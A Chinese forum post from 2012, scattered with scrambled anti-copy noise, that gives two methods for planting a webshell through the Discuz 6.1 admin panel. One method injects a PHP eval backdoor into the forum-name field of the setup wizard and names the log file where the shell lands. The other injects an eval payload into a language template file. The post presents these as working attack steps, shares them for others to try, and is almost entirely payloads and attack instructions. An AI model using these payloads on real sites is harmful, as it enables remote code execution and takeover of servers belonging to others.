discuz6.1两种方法后台拿shell: P: f' O7 \9 w8 r- I
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
6 o1 O- X6 ?/ x' ?+ a1 l1:
& t9 ]4 \4 R( ~$ r: Ghttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
, Y: R& A; y) @5 fadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell4 t) m) _6 F6 x& E: \
<?php eval($_POST[cmd]);?>' B" g- d$ f7 t( A
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php" U. I# q4 y, Y$ Y) [9 x5 V
3 D+ [; E/ G+ G2 \: q3 c
3 l1 r1 b" C( V: U7 u
2:后台模板管理--默认模板套系--详情
$ t1 i$ d) v5 X# @, u5 btemplates/default/actions.lang.php
5 F0 q8 P9 Z x D! T E* `* |jhackj\\');eval($_POST[cmd])?>;//7 s6 r4 z: a9 B& Q6 z
) \/ F r( ]" I6 T利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对